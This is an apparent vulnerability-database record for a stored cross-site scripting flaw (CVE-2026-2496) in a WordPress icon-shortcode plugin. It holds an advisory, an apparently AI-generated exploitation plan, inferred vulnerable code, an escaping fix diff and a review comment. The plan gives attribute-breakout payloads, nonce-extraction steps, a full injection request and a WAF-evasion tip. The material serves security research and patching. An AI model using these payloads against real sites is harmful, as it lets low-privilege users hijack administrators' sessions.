[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fVi7q3oCxc3q6Brfz2U06L_6aTdXRGaGVCDZItHzEf-k":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-2496","eds-font-awesome-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attributes","Ed's Font Awesome \u003C= 2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The Ed's Font Awesome plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `eds_font_awesome` shortcode in all versions up to, and including, 2.0. This is due to insufficient input sanitization and output escaping on user supplied attributes. 
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","eds-font-awesome",null,"\u003C=2.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-20 15:15:40","2026-04-15 17:39:44",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F435e8ca8-cf00-4de9-a454-8cb09b7661ef?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-2496 (Ed's Font Awesome)\n\n## 1. Vulnerability Summary\nThe **Ed's Font Awesome** plugin (\u003C= 2.0) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists in the rendering logic of the `[eds_font_awesome]` shortcode. The plugin fails to sanitize or escape user-supplied attributes (such as `name`, `class`, or `size`) before echoing them within an HTML `\u003Ci>` or `\u003Cspan>` tag. \n\nBecause WordPress allows users with the **Contributor** role to use shortcodes but restricts them from using `unfiltered_html`, this vulnerability allows a low-privileged user to bypass security filters and inject arbitrary JavaScript that executes in the context of any user (including Administrators) who views the post.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress Post Editor (`\u002Fwp-admin\u002Fpost.php` or REST API `\u002Fwp\u002Fv2\u002Fposts`)\n*   **Vulnerable Component:** Shortcode `[eds_font_awesome]`\n*   **Vulnerable Parameter(s):** Shortcode attributes (specifically `name`, `class`, `size`, or `style`)\n*   **Authentication Level:** Contributor+ (Authenticated)\n*   **Preconditions:** The plugin must be active. A Contributor must have the ability to create or edit a post\u002Fpage.\n\n## 3. Code Flow (Inferred)\n1.  
**Registration:** The plugin registers the shortcode during the `init` hook:\n    `add_shortcode('eds_font_awesome', 'eds_fa_shortcode_handler');` (inferred function name).\n2.  **Processing:** When a post is rendered, WordPress calls the handler function.\n3.  **Attribute Extraction:** The handler uses `shortcode_atts()` to parse user input:\n    ```php\n    $a = shortcode_atts(array(\n        'name'  => '',\n        'size'  => '',\n        'class' => '',\n        \u002F\u002F ... other attributes\n    ), $atts);\n    ```\n4.  **Sink:** The extracted attributes are concatenated into an HTML string without using `esc_attr()`:\n    ```php\n    \u002F\u002F VULNERABLE SINK\n    return '\u003Ci class=\"fa ' . $a['name'] . ' ' . $a['class'] . '\">\u003C\u002Fi>'; \n    ```\n5.  **Output:** The unsanitized string is returned to the WordPress content filter and displayed on the page.\n\n## 4. Nonce Acquisition Strategy\nTo exploit this via the standard WordPress post creation flow, the agent must obtain a post-authoring nonce.\n\n1.  **Authentication:** Login as a user with the `contributor` role.\n2.  **Navigation:** Use `browser_navigate` to go to `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost-new.php`.\n3.  **Extraction:** Use `browser_eval` to extract the `_wpnonce` required for the `post.php` endpoint.\n    *   Command: `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n4.  **Alternative (REST API):** If the REST API is used, the agent needs the `X-WP-Nonce` header.\n    *   Command: `browser_eval(\"wpApiSettings.nonce\")`\n\n## 5. Exploitation Strategy\nThe goal is to create a post containing a shortcode that breaks out of an HTML attribute to execute JavaScript.\n\n### Step-by-Step Plan:\n1.  **Identify Attributes:** Use `grep -r \"add_shortcode\" .` in the plugin directory to find the handler function and identify which attributes are concatenated into the output.\n2.  
**Craft Payload:** \n    *   Attribute breakout: `name='fa-user\" onmouseover=\"alert(document.domain)\"'`\n    *   Full Shortcode: `[eds_font_awesome name='fa-user\" onmouseover=\"alert(document.domain)\"']`\n3.  **Inject via HTTP Request:**\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n    *   **Method:** `POST`\n    *   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n    *   **Body:**\n        ```\n        action=editpost\n        post_ID=[NEW_POST_ID]\n        _wpnonce=[EXTRACTED_NONCE]\n        post_title=VulnerablePost\n        content=[eds_font_awesome name='fa-user\" onmouseover=\"alert(document.domain)\"']\n        publish=Publish\n        ```\n4.  **Trigger:** Navigate to the public URL of the newly created post as any user.\n\n## 6. Test Data Setup\n1.  **User Creation:** Create a user with the `contributor` role.\n    *   `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n2.  **Plugin Activation:** Ensure `eds-font-awesome` is active.\n    *   `wp plugin activate eds-font-awesome`\n3.  **Post Initialization:** Create an initial draft to get a `post_ID`.\n    *   `wp post create --post_type=post --post_status=draft --post_author=$(wp user get attacker --field=ID)`\n\n## 7. Expected Results\n*   The HTTP response from `post.php` should indicate a successful redirect (302) or success.\n*   When viewing the post HTML source, the rendered output should look like:\n    `\u003Ci class=\"fa fa-user\" onmouseover=\"alert(document.domain)\" \">\u003C\u002Fi>`\n*   The `onmouseover` event handler will be present in the DOM, executing the payload when a user hovers over the (invisible or small) icon.\n\n## 8. Verification Steps\n1.  **Check Database:** Use WP-CLI to verify the shortcode is stored in the `post_content`.\n    *   `wp post get [ID] --field=post_content`\n2.  
**Verify Rendering:** Use `http_request` to fetch the post frontend and grep for the breakout.\n    *   `http_request(\"http:\u002F\u002Flocalhost:8080\u002F?p=[ID]\")`\n    *   Search for: `onmouseover=\"alert(document.domain)\"`\n3.  **Verify Non-Escaping:** Confirm the `\"` character was not converted to `&quot;`.\n\n## 9. Alternative Approaches\n*   **Different Attributes:** If `name` is sanitized, try `class`, `size`, or `style`.\n*   **Tag Breakout:** If the attribute is inside a double-quoted string, try: `name='fa-user\">\u003Cscript>alert(1)\u003C\u002Fscript>'`.\n*   **CSS Injection:** If only the `style` attribute is vulnerable, use `style=\"background-image: url('javascript:alert(1)')\"`.\n*   **REST API Injection:** Use `POST \u002Fwp\u002Fv2\u002Fposts\u002F[ID]` with the `X-WP-Nonce` header to update the content, which is often less protected by WAFs than the admin `post.php` endpoint.","The Ed's Font Awesome plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the [eds_font_awesome] shortcode. Due to missing sanitization and output escaping on attributes like 'name' and 'class', a contributor-level user can inject arbitrary JavaScript that executes whenever a user views the affected post.","\u002F\u002F Inferred registration and handler logic for the [eds_font_awesome] shortcode\n\nadd_shortcode('eds_font_awesome', 'eds_fa_shortcode_handler');\n\nfunction eds_fa_shortcode_handler( $atts ) {\n    $a = shortcode_atts( array(\n        'name'  => '',\n        'size'  => '',\n        'class' => '',\n        'style' => '',\n    ), $atts );\n\n    \u002F\u002F VULNERABLE SINK: Attributes are concatenated into the HTML string without escaping\n    return '\u003Ci class=\"fa ' . $a['name'] . ' ' . $a['class'] . '\" style=\"' . $a['style'] . '\">\u003C\u002Fi>'; \n}","--- a\u002Feds-font-awesome.php\n+++ b\u002Feds-font-awesome.php\n@@ -10,5 +10,5 @@\n     ), $atts );\n \n-    return '\u003Ci class=\"fa ' . $a['name'] . ' ' . 
$a['class'] . '\" style=\"' . $a['style'] . '\">\u003C\u002Fi>';\n+    return '\u003Ci class=\"fa ' . esc_attr($a['name']) . ' ' . esc_attr($a['class']) . '\" style=\"' . esc_attr($a['style']) . '\">\u003C\u002Fi>';\n }","1. Authenticate as a user with at least Contributor-level privileges (allows post creation and shortcode usage).\n2. Create a new post or page via the WordPress editor (e.g., \u002Fwp-admin\u002Fpost-new.php).\n3. Insert the [eds_font_awesome] shortcode with a malicious payload in one of its attributes (e.g., name or class) that breaks out of the HTML attribute context.\n4. Example payload: [eds_font_awesome name='fa-user\" onmouseover=\"alert(document.domain)\"']\n5. Save or publish the post.\n6. The payload executes in the browser of any user (including Administrators) who views the post on the frontend, triggering the JavaScript when they interact with or view the rendered icon tag.","gemini-3-flash-preview","2026-04-18 00:50:06","2026-04-18 00:50:28",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feds-font-awesome\u002Ftags"]
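Review bot: wrapping `$a['name']`, `$a['class']` and `$a['style']` in esc_attr() on the `+` line is the correct escaping for a double-quoted attribute context and closes the quote breakout, but `style` still carries whatever CSS a contributor supplies (escaped, not validated) and `name`/`class` are only ever meant to be class tokens, so the sink would be tighter if `style` were passed through safecss_filter_attr() or dropped from the shortcode_atts() list, and the class values were split on whitespace with each token run through sanitize_html_class(); a short comment above the return stating the attribute context would also keep a later edit from undoing the escaping.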